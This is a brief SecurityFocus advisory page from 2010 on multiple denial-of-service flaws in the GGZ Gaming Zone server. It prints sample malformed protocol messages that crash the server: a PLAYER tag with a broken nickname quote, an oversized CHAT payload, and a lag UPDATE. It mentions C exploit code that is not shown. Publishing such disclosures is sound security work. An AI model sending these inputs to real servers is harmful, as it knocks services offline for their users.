GGZ Gaming Zone Multiple Denial Of Service Vulnerabilities


An exploit is not required.


Examples have been provided:

<PLAYER ID='mynick'' TYPE='guest' TABLE='-1' LAG='1'/>

<CHAT TYPE='normal' FROM='mynick'><![CDATA[aaaaaaaaaaaaaaaaaaaaaaa...
...aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_end_here
<UPDATE TYPE='player' ACTION='lag' ROOM='0'>


Sample exploit code written in C has been provided:


 

Privacy Statement
Copyright 2010, SecurityFocus